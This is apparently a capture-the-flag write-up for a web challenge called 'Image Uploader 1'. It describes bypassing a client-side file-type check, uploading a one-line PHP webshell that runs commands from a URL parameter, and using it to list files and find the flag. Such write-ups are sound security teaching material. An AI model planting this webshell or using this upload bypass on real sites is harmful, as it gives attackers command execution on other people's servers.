# [EN] Image Uploader 1 ###### tags: `Writeup` `Web` `English` > [name=FlyDragon] ## Step.1 http://lotuxctf.com:20008  It is a image uploader. Upload a `test.png` , and you will get this message. ``` Uploaded at : uploads/64fd8aff877ba_test.png ``` Visit this path to view what we uploaded. We can upload a **php webshell** to get the flag ## Step.2 You can upload any file after modifying frontend code. ```js <input type="file" name="image" accept="image/*" required=""> ``` Upload a `shell.php`. ```php <?php system($_GET["cmd"]); ?> ``` Visit the path and pass a parameter `?cmd=ls` to use `ls` . There is a `flag.txt`. {%hackmd M1bgOPoiQbmM0JRHWaYA1g %}